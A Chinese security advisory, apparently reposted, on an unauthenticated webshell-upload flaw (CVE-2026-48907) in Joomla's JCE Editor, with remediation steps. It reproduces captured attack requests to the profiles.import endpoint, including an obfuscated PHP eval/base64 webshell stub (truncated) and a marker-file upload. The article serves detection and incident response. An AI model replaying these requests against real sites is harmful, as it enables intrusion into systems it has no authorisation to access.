紧急提醒:JCEEditor未授权访问漏洞已致多站点失陷(CVE-2026-48907)

admin 2026-07-02 05:05:25 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档披露JCEEditor组件存在高危未授权访问漏洞CVE-2026-48907,攻击者无需登录即可通过profiles.import接口上传Webshell。关键发现包括攻击流量特征、遗留标记文件Nxploited及常见藏匿路径。建议立即升级至2.9.99.6版本、清理可疑Profile、扫描删除恶意文件并轮换系统凭证。 综合评分: 85 文章分类: 漏洞分析,应急响应,解决方案,WEB安全,漏洞预警


cover_image

紧急提醒:JCE Editor 未授权访问漏洞已致多站点失陷(CVE-2026-48907)

原创

流量名侦探 流量名侦探

流量名侦探

2026年7月1日 09:37 山东

在小说阅读器读本章

去阅读

⚠️ 影响评级:高危 无需登录,两步即可完成 Webshell 上传,攻击代码已于 6月9日 公开,Joomla 用户务必立即排查。

攻击流量分析:警惕IPV6攻击

GET /index.php?option=com_jce&view=popup HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Connection: keep-aliveAccept-Language: en-US,en;q=0.9Cookie: X-Forwarded-Proto: httpsX-Forwarded-For: 2a09:bac5:3214:254b::3b7:3d
HTTP/1.1 303 See otherServer: nginxDate: Tue, 30 Jun 2026 18:23:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveSet-Cookie: X-Logged-In: FalseX-Content-Powered-By: K2 v2.9.1 (by JoomlaWorks)

从响应中暴露了版本

K2 v2.9.1 (by JoomlaWorks)

上传webshell

POST /index.php?option=com_jce&task=profiles.import HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Connection: keep-aliveAccept-Language: en-US,en;q=0.9Cookie: Content-Length: 3155Content-Type: multipart/form-data; boundary=b582b5ffef72b253e8ba092526d849b6X-Forwarded-Proto: httpsX-Forwarded-For: 2a09:bac5:3214:254b::3b7:3d
--b582b5ffef72b253e8ba092526d849b6Content-Disposition: form-data; name=""
1--b582b5ffef72b253e8ba092526d849b6Content-Disposition: form-data; name="option"
com_jce--b582b5ffef72b253e8ba092526d849b6Content-Disposition: form-data; name="task"
profiles.import--b582b5ffef72b253e8ba092526d849b6Content-Disposition: form-data; name="profile_file"; filename="n.php"Content-Type: application/x-php
<?php eval(gzinflate(base64_decode("rVjrU9w4Ev9XjO..........")));?>--b582b5ffef72b253e8ba092526d849b6--
POST /index.php?option=com_jce&task=profiles.import HTTP/1.1Host:&nbsp;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Connection: keep-aliveAccept-Language: en-US,en;q=0.9Cookie:&nbsp;Content-Length: 498Content-Type: multipart/form-data; boundary=ca09ebac93782287eda85f48509d2b17X-Forwarded-Proto: httpsX-Forwarded-For: 2a09:bac5:3214:254b::3b7:3d
--ca09ebac93782287eda85f48509d2b17Content-Disposition: form-data; name="d783756ba6d5a793b"
1--ca09ebac93782287eda85f48509d2b17Content-Disposition: form-data; name="option"
com_jce--ca09ebac93782287eda85f48509d2b17Content-Disposition: form-data; name="task"
profiles.import--ca09ebac93782287eda85f48509d2b17Content-Disposition: form-data; name="profile_file"; filename="n.txt"Content-Type: text/plain
Nxploited--ca09ebac93782287eda85f48509d2b17--

快速排查防范

日志搜索

在 Web 服务器日志(nginx access.log 或 Apache)中搜索以下关键词:

option=com_jce
task=profiles.import

目录扫描

攻击者遗留的恶意文件通常藏在这些位置:

  • /images/

    — 最常见

  • /tmp/

  • /media/system/js/

  • /libraries/joomla/

特别注意以 .xml.php 结尾的文件,以及名为 Nxploited 的标记文件——后者是自动化攻击工具用来识别已攻陷站点的”记号”。

如何修复?(按顺序执行)

  1. 立即升级 JCE Editor

将 JCE Editor 组件更新至 2.9.99.6 或更高版本(免费版/专业版均适用)。

升级操作不会影响现有编辑器功能与配置,但能修复已知高危漏洞(如反序列化及文件上传绕过)。

  1. 清理可疑的编辑器配置(Profile)

登录 Joomla 后台,依次进入:Components → JCE Editor → Editor Profiles。

逐一检查所有 Profile 列表,删除名称异常(如乱码、包含 test/backdoor 等字样)或非管理员创建的 Profile。

若无法确认,可暂时停用(Unpublish)可疑 Profile,观察网站运行是否正常后再彻底删除。

  1. 彻底清除 WebShell 后门文件

重点扫描以下目录,查找最近新增/修改的 .php、.phtml、.ico 等可执行文件:

/administrator/components/com_jce/

/components/com_jce/

/media/ 及 /tmp/、/cache/

删除所有非 Joomla 核心或非必要第三方组件的 PHP 文件,尤其注意文件名包含 shell、cmd、eval、upload 等敏感词。

建议使用命令行工具(如 find -mtime -1 -name “*.php”)快速定位近期异常文件。

  1. 全面轮换系统凭证与会话

重置所有管理员密码(包括超级管理员)——通过后台用户管理或数据库直接更新。

更新 Joomla 安全密钥:在 configuration.php 中重新生成 $secret 值(可在线生成随机字符串)。

强制所有现有 Session 失效:清除 /administrator/cache/ 下的会话缓存,或重启 PHP-FPM / Web 服务。

此步骤可确保攻击者即使已窃取旧密码或 Session Cookie,也无法再次登录后台。

✅ 执行完毕后,建议使用安全扫描工具(如 WPScan 或 Joomla! Security Check)再次全盘扫描,确认无残留后门。若业务允许,可考虑对 /administrator 路径增设 IP 白名单或二次验证(如 Google Authenticator)


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:流量名侦探 流量名侦探 流量名侦探《紧急提醒:JCE Editor 未授权访问漏洞已致多站点失陷(CVE-2026-48907)》

评论:0   参与:  0